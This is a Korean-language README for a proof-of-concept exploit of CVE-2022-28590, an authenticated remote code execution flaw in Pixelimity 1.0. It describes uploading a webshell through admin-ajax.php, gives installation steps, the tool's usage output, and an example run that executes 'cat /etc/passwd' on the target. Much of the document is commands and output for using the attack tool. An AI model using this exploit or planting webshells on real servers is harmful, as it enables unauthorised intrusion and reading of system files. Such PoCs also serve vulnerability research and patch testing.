
Pixelimity 1.0의 원격 코드 실행 취약점인 CVE-2022-28590에 대한 개념 증명 익스플로잇입니다. 인증된 명령 실행을 위해 admin-ajax.php를 통해 웹쉘을 업로드합니다.
원본 발견 및 수동 PoC는 tuando243에서 제공되었습니다:
Pixelimity 1.0에서 admin/admin-ajax.php?action=install_theme를 통해 원격 코드 실행(RCE) 취약점이 존재합니다.
이 PoC는 추가 원격 코드 실행을 위해 간단한 웹쉘을 업로드합니다. 이 익스플로잇은 서버에서 system() 함수가 허용되어 있어야 하며, 그렇지 않으면 system 외에 어떤 함수가 실행을 허용하는지 탐지하기 위해 사전 정찰이 수행되어야 합니다.
git clone https://github.com/jcarabantes/CVE-2022-28590.git
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2022-28590.py -h
python CVE-2022-28590.py -h
___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ ( _ )| __)/ _ \ / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ / _ \|__ \_ /( (_) )
\___) \/ (____) (____)\___/(____)(____) (____)\___/(___/ (_/ \___/
Vulnerability discovered by tuando243
PoC author: @javicarabantes
usage: CVE-2022-28590.py [-h] [-d] [-q] --url URL --user USER [--password PASSWORD] [-c COMMAND]
optional arguments:
-h, --help show this help message and exit
-d Debug output
-q Do not print the banner
--url URL url: https://server:8081/
--user USER admin user
--password PASSWORD admin password
-c COMMAND Command to execute. Default: id
python CVE-2022-28590.py --url http://localhost:8082 --user myuser -c "cat /etc/passwd"
